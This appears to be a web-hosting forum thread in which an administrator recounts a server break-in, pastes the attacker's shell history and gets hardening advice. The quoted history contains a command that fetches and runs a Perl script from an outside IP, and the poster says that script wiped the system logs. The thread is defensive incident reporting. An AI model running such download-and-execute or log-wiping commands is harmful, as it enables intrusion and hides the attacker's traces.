Hacking attempt with a problem help

[bsasninja]

Hi today I received a hacking attempt, somehow I dont know yet they get into one of my servers, they modified my sshd_config and they blockme away from accessing to the server anymore. So a technician of the DC went to my machine, restored the sshd_config file and I was allowed to log again.

Looking at my root .bash_history i found:
pico /usr/local/apache/conf/includes/errordocument.conf (they modified a 403 page to some hacked site)
service httpd restart
ls -l /
chmod 000 /home
w
w
w
chmod 711 /home
cd /tmp
perl log
wget 41.140.123.34/log
perl log
top
mcedit /etc/ssh/sshd_config
service sshd restart
exit

ok this is what the attacker did, the file log that he downloaded is a file that remove all traces, but he forgot this one.
I have blocked all africa traffic as a first step, now the log script removed the following files:

/var/log/lastlog
/var/log/messages
/var/log/warn
/var/log/wtmp
/var/log/secure
/var/log/auth
/var/log/auth.log

I had to restore wtmp file. Now the problem is the following if I log to the server shows me no users on it, when I run TOP show 0 users and Im online in the server, also if I put who or w shows nothing.
How do I fix this???

Thank you!

 

[bsasninja]

I found the solution also the file at /var/run/utmp was removed. I created it again and now is working

 

[k-planethost]

i suggest to harden your ssh disable telnet make sure it is up to date and move ssh to a different port that 22

 

[bsasninja]

port was already in other port ssh was hardened also, telnet disabled. Today I will dig into the server to see how the could break in.

Also Im running antispyware-antivirus-trojan tools on my computer to see if there is some sniffing app.

 

[cPanelTristan]

Do you provide your root password to anyone else? If so, you would want to ensure that user also runs a check on their local system.

I would likewise suggest not allowing direct root login, but a wheel group user who has only sudo su - access, then disallowing direct root login if you haven't done so.

Next, I would restrict SSH to only your IP address(es). You can do that in WHM > Host Access Control area by setting allow only for your IP for sshd and then disallowing all other IPs. Good luck to an attacker to get into the machine without direct control over your local system at that point.

 

[bsasninja]

I have direct root logins disabled and /tmp dev/shm protected
I have also closed all user open folders with 777 permisions. I disabled some apache_* php functions.
All server soft is updated to the latetest versions. Except for php that is still in 5.2.17 cause if I turn to 5.3 lot of server scritps will stop working. Anyways I have a plan to upgrade this year before I give some time to my customers to do the necesary changes to their scritps.

 

[cass]

Do you found what was the problem/hole ?
We had this same issue on a client server today, but still looking to see what is the hole, the server had suphp, and other hardening, but still hacked the same way, changing 403 to a page, and chmod 000 to /home, same team for sure.